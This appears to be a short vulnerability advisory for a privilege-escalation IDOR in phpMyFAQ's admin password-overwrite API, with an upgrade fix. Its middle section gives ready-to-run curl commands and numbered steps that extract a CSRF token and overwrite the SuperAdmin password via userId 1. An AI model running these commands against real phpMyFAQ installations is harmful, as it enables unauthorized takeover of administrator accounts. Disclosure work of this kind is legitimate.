phpMyFAQ, Insecure Direct Object Reference (IDOR), GHSA-xvp4-phqj-cjr3 (High)

Listen to this Post

How the CVE Works

The vulnerability exists in the `overwritePassword()` method of phpMyFAQ’s Admin API.
The endpoint is accessible at `/admin/api/user/overwrite-password` via a PUT request.
It is intended to allow admins with `USER_EDIT` permission to change a user’s password.
However, the method does not verify that the requesting admin is authorized to modify the target user.
The `userId` parameter is taken directly from the request body without any ownership or privilege check.
An attacker with a low-privilege admin account can modify this `userId` value.
By setting `userId` to `1` (the SuperAdmin account), the attacker can overwrite the SuperAdmin’s password.
No validation ensures that the target user has equal or lower privileges than the attacker.
A valid CSRF token is still required, but it can be extracted from any admin page.
The attack bypasses all authorization logic because the code never checks if the admin should be able to manage the target user.
This flaw effectively removes any privilege separation among admin accounts.
Any admin user can instantly escalate to full SuperAdmin control.

The vulnerable code resides in `UserController.php` lines 232–271.

No multi-factor confirmation or additional checks are performed for such a sensitive action.
The attack complexity is low, requiring only a valid admin session with `USER_EDIT` permission.

dailycve form

Platform: phpMyFAQ
Version: <4.1.3
Vulnerability: IDOR
Severity: High
date: 2026-05-20

Prediction: Patch 2026-05-18

Analytics under What Undercode Say:

Extract CSRF token from admin page
curl -sL -b "PHPSESSID=admin_session" http://target/admin/index.php | grep -oP 'pmf-csrf-token.?value="\K[^"]+'
Change SuperAdmin password via IDOR
curl -X PUT -H "Content-Type: application/json" \
-b "PHPSESSID=admin_session" \
-d '{
"userId": 1,
"csrf": "admin_csrf_token_value",
"newPassword": "NewSuperAdminP@ss123!",
"passwordRepeat": "NewSuperAdminP@ss123!"
}' \
http://target/admin/api/user/overwrite-password

Exploit:

1. Obtain a low-privilege admin session.

2. Extract CSRF token from any admin page.

  1. Send PUT request to `/admin/api/user/overwrite-password` with "userId": 1.

4. Receive success response.

  1. Log in as SuperAdmin with the new password.

Protection from this CVE

Upgrade to phpMyFAQ version 4.1.3 or later.

If upgrade is not possible, restrict network access to the admin API and enforce strict role-based access controls manually.

Impact

Privilege escalation from any admin user to SuperAdmin.

Full takeover of the phpMyFAQ instance, including access to all data, configuration, and user accounts.

Complete breakdown of multi-admin privilege separation.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top